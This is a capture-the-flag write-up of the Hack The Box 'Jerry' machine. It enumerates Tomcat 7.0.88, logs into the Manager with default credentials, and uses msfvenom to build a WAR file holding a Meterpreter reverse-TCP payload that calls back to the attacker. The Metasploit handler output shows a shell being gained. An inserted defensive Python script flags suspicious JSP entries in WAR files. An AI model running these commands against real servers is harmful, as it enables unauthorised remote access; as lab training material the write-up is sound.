This is the fourth part of the Hack The Box Beginner Track: “Jerry”.
nmap reveals only one open port, which is Tomcat 7.0.88 on port 8080:
PORT     STATE SERVICE VERSION
8080/tcp open  http    Apache Tomcat/Coyote JSP engine 1.1
| http-methods:
|_  Supported Methods: GET POST OPTIONS
|_http-server-header: Apache-Coyote/1.1
|_http-title: Apache Tomcat/7.0.88
The box is tagged “Default Credentials”, so let’s see if this helps us here. The Tomcat login page opens at /manager/html. After entering a wrong password, we get a “403 - Access Denied” page that includes a sample configuration showing how to define a manager user. It lists a username and password.
Now, if we log in again (you need to clear the cache or use a private window), we are in!
Googling for “Tomcat 7.0.88 exploit”, we get a couple of hits regarding remote code execution via JSP upload. Let’s see if Metasploit has something prepared:
Unfortunately both exploit 7 and exploit 25 fail, so we might need to find a more manual approach.
Let’s create a WAR-file with msfvenom:
$ msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.74 -f war -o backupjob.war LPORT=4444
A WAR file is an archive that packages a web application, i.e. its JAR files and other resources. We can check the contents with jar -ft backupjob.war:
$ jar -ft backupjob.war
Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true
META-INF/
META-INF/MANIFEST.MF
WEB-INF/
WEB-INF/web.xml
maviljcffocdph.jsp
This means the file we actually need to get executed is maviljcffocdph.jsp. To do that, we simply request it (for example via curl or the browser) using the URL shown for the application in the Manager's application list.
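From the defender's side, the listing above is exactly what a deployment review should catch: a WAR whose only content is a single randomly named JSP at the archive root. The following script is an added example, not part of this write-up or of any tool it uses; it builds a constructed WAR mirroring that listing (the JSP body is a placeholder, not a payload) and flags JSP entries by name pattern and by tokens a benign JSP view rarely needs.

```python
import io
import re
import zipfile

# Indicators of command execution / network access that a normal JSP view
# rarely needs; a hit is a reason to review the deployment, not proof by itself.
SUSPICIOUS_TOKENS = (
    "Runtime.getRuntime().exec",
    "ProcessBuilder",
    "java.net.Socket",
)
# msfvenom-style names: one lowercase word of 8+ letters, sitting at the archive root.
RANDOM_NAME = re.compile(r"^[a-z]{8,}\.jsp$")


def build_sample_war() -> bytes:
    """Constructed WAR mirroring the entry list printed by `jar -ft backupjob.war`."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("META-INF/MANIFEST.MF", "Manifest-Version: 1.0\n")
        z.writestr("WEB-INF/web.xml", "<web-app/>\n")
        # Placeholder body: it only mentions the indicators a generated payload would use.
        z.writestr("maviljcffocdph.jsp",
                   '<%@ page import="java.net.Socket" %>\n'
                   '<% /* Runtime.getRuntime().exec would be called here */ %>\n')
    return buf.getvalue()


def inspect_war(data: bytes) -> dict:
    """Map each JSP entry in the WAR to the list of reasons it looks suspicious."""
    findings = {}
    with zipfile.ZipFile(io.BytesIO(data)) as z:
        for name in z.namelist():
            if not name.lower().endswith(".jsp"):
                continue
            reasons = []
            if RANDOM_NAME.match(name):
                reasons.append("random-looking name at archive root")
            body = z.read(name).decode("utf-8", errors="replace")
            reasons += [f"contains {t}" for t in SUSPICIOUS_TOKENS if t in body]
            findings[name] = reasons
    return findings


if __name__ == "__main__":
    for jsp, why in inspect_war(build_sample_war()).items():
        print(jsp, "->", "; ".join(why) or "no indicators")
```

Run the same function over the WARs in a real Tomcat webapps directory (or over Manager upload requests captured at a proxy) to surface deployments that deserve a closer look.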
In parallel, of course, we need to have the listener ready in Metasploit (use multi/handler). Now we simply call the JSP file and we get a shell.
msf6 exploit(multi/handler) > run
[*] Started reverse TCP handler on 10.10.14.74:4444
[*] Sending stage (175686 bytes) to 10.129.75.105
[*] Meterpreter session 1 opened (10.10.14.74:4444 -> 10.129.75.105:49192) at 2022-10-28 11:58:31 -0400
meterpreter > shell
Process 2872 created.
Channel 1 created.
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.

C:\apache-tomcat-7.0.88>id
id
'id' is not recognized as an internal or external command,
operable program or batch file.

C:\apache-tomcat-7.0.88>
In the Desktop folder of the Administrator user, we can find both flags.